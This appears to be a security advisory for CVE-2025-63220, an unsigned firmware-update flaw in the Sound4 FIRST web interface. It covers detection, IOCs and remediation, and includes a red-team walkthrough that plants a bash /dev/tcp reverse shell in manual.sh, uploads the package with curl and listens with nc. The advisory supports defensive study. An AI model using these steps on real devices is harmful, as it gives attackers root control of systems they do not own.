CVE-2025-63220
Executive Summary
CVE-2025-63220 exposes a critical Remote Code Execution (RCE) vulnerability in the Sound4 FIRST web-based management interface. The flaw resides in the firmware update mechanism, which fails to validate the integrity of the manual.sh script. An attacker can craft a malicious firmware update package by modifying manual.sh to inject arbitrary commands, then repackage and upload it to the device. Successful exploitation grants full remote control over the affected Sound4 FIRST appliance, enabling data exfiltration, lateral movement, or persistent backdoor installation. No patch or advisory has been released by the vendor at this time.

- Availability (A): High (H) – Full system control.
Deep Dive & Mechanics
The Sound4 FIRST management interface provides a firmware update feature that accepts a compressed package (e.g., .tar.gz or .zip). The update process extracts the package and executes a script named manual.sh to apply custom configurations or post-update tasks. The vulnerability arises because the update mechanism does not cryptographically sign or checksum the contents of the package. An attacker can:
- Obtain a legitimate firmware update package.
- Decompress the package.
- Modify
manual.shto include arbitrary shell commands (e.g., reverse shell, backdoor user creation). - Repackage the modified files.
- Upload the malicious package via the web interface.
The device then executes the tampered manual.sh with root privileges, granting the attacker full control.
Vulnerable vs. Patched Code
Vulnerable Code (Conceptual):
#!/bin/bash
# firmware_update.sh - extracts and runs manual.sh
tar -xzf firmware_package.tar.gz -C /tmp/update
chmod +x /tmp/update/manual.sh
/tmp/update/manual.sh
Patched Code (Conceptual):
#!/bin/bash
# firmware_update.sh - validates signature before execution
tar -xzf firmware_package.tar.gz -C /tmp/update
if gpg --verify /tmp/update/manual.sh.sig /tmp/update/manual.sh; then
chmod +x /tmp/update/manual.sh
/tmp/update/manual.sh
else
echo "Signature verification failed. Aborting."
exit 1
fi
The patched version introduces GPG signature verification of manual.sh before execution, preventing tampered scripts from running.
Exploitation & Lab Setup
Red Team
Lab Setup:
- Target: Sound4 FIRST appliance with web interface exposed (e.g.,
http://192.168.1.100:8080). - Attacker: Kali Linux with
curl,tar, and a text editor.
Exploitation Steps:
- Obtain a legitimate firmware package (e.g.,
firmware_v1.0.tar.gz). - Extract the package:
mkdir exploit && cd exploit tar -xzf ../firmware_v1.0.tar.gz - Modify
manual.shto include a reverse shell:#!/bin/bash # manual.sh - backdoored bash -i >& /dev/tcp/192.168.1.200/4444 0>&1 - Repackage the firmware:
tar -czf ../malicious_firmware.tar.gz * - Upload the malicious package via the web interface:
curl -X POST -F "file=@malicious_firmware.tar.gz" http://192.168.1.100:8080/update - Listen for the reverse shell:
nc -lvnp 4444

Detection & Response:
- Monitor for unexpected firmware uploads via web logs (e.g.,
POST /updatewith large payloads). - Alert on execution of
/tmp/update/manual.shvia auditd or sysmon. - Block outbound connections from the device to unknown IPs (e.g., port 4444).
- Implement network segmentation to isolate Sound4 appliances from critical assets.
Indicators of Compromise (IOCs)
- Network:
- Outbound connections to attacker-controlled IPs on high ports (e.g., 4444, 8080).
- Unusual HTTP POST requests to
/updatewithContent-Type: multipart/form-data.
- File System:
- Presence of
/tmp/update/manual.shwith unexpected content (e.g., reverse shell commands). - Modified firmware packages with altered checksums.
- Presence of
- Process:
- Execution of
bashorshfrom/tmp/update/directory. - Child processes spawned by the update script (e.g.,
nc,bash -i).
- Execution of

Remediation & Mitigation
- Immediate: Disable the firmware update feature on the web interface if not required. Restrict network access to the management interface to trusted IPs only.
- Short-term: Implement a Web Application Firewall (WAF) rule to block uploads of files containing
manual.shor suspicious shell commands. - Long-term: Contact Sound4 for an official patch. In the interim, develop a custom update validation script that checks cryptographic signatures before execution.
- Compensating Controls: Enable audit logging on the device, monitor for anomalous process execution, and enforce strict egress filtering.
